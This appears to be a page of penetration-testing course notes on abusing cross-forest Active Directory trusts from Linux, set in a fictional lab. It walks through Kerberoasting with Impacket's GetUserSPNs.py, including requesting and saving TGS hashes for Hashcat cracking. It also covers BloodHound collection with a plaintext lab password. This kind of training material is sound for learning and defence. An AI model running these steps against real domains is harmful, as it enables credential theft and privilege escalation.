🌳Cross-Forest Trust Abuse From Linux

Cross-Forest Kerberoasting

Just like with Windows, we are able to perform similar operations from a Linux attack host

Using GetUserSPNS.py

We need credentials for a user we can authenticate into the other domain, which we can specify with the -target-domain flag.

GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley

Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation

Password:
ServicePrincipalName                 Name      MemberOf                                                PasswordLastSet             LastLogon  Delegation 
-----------------------------------  --------  ------------------------------------------------------  --------------------------  ---------  ----------
MSSQLsvc/sql01.freightlogstics:1433  mssqlsvc  CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL  2022-03-24 15:47:52.488917  <never>

We can use the -request flag to gives us the TGS ticket, and the -outputfile flag to choose a file to directly save it to. which we could attempt to crack offline with Hashcat and the mode 13100

GetUserSPNs.py -request -outputfile tgs.hash -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley

Hunting Foreign Group Membership

From the last section, we saw that may see users or admins from a domain as members of a group in another domain. On Linux we can gather information using bloodhound-python to collect data from multiple domains.

Adding DOMAIN Information to /etc/resolv.conf

We may need to change our DNS hostname for the targeted DC instead of an IP address, so we can edit our file like below to achieve this

cat /etc/resolv.conf 

# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
#     DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
# 127.0.0.53 is the systemd-resolved stub resolver.
# run "resolvectl status" to see details about the actual nameservers.

#nameserver 1.1.1.1
#nameserver 8.8.8.8
domain INLANEFREIGHT.LOCAL
nameserver 172.16.5.5

Running bloodhound-python Against INLANEFREIGHT.LOCAL

bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2

INFO: Found AD domain: inlanefreight.local
INFO: Connecting to LDAP server: ACADEMY-EA-DC01
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 559 computers
INFO: Connecting to LDAP server: ACADEMY-EA-DC01
INFO: Found 2950 users
INFO: Connecting to GC LDAP server: ACADEMY-EA-DC02.LOGISTICS.INLANEFREIGHT.LOCAL
INFO: Found 183 groups
INFO: Found 2 trusts

<SNIP>

Compressing the File 

zip -r ilfreight_bh.zip *.json

  adding: 20220329140127_computers.json (deflated 99%)
  adding: 20220329140127_domains.json (deflated 82%)
  adding: 20220329140127_groups.json (deflated 97%)
  adding: 20220329140127_users.json (deflated 98%)

Viewing Dangerous Rights in BloodHound

Once we upload our data, we can click on Users with Foreign Domain Group Membership under the Analysis tab and select the source domain as INLANEFREIGHT.LOCAL.

PreviousCross-Forest Trust Abuse From WindowsNextPivoting, Port Forwarding and Tunnelling

Last updated

Was this helpful?